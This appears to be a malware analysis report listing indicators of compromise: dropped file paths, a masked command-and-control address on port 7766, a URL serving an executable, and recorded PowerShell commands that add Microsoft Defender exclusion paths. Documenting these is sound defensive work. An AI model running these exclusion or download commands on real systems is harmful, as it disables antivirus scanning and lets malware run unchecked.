Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe
- %ALLUSERSPROFILE%\hostdata\logs.uce
- %TEMP%\logs.uce
- C:\logs.uce
- %ALLUSERSPROFILE%\hostdata\logs.uce
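- '19#.#06.191.16':7766 (address partially masked with '#' in the source report)
- http://19#.##6.191.16:7766/Task29Watch.exe via 19#.#06.191.16 (executable fetched over plain HTTP on the same non-standard port, 7766)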
- '%WINDIR%\microsoft.net\framework\v4.0.30319\vbc.exe'
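- '%WINDIR%\syswow64\cmd.exe' /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost" & powershell -Com... (command line truncated in the source report; the visible part adds Microsoft Defender Antivirus path exclusions, so files in those folders are no longer scanned. Unexpected entries appear in the ExclusionPath list returned by Get-MpPreference.)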
- '%WINDIR%\syswow64\chcp.com' 1251
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\HostData" (this exclusion covers the folder that holds logs.uce, listed above)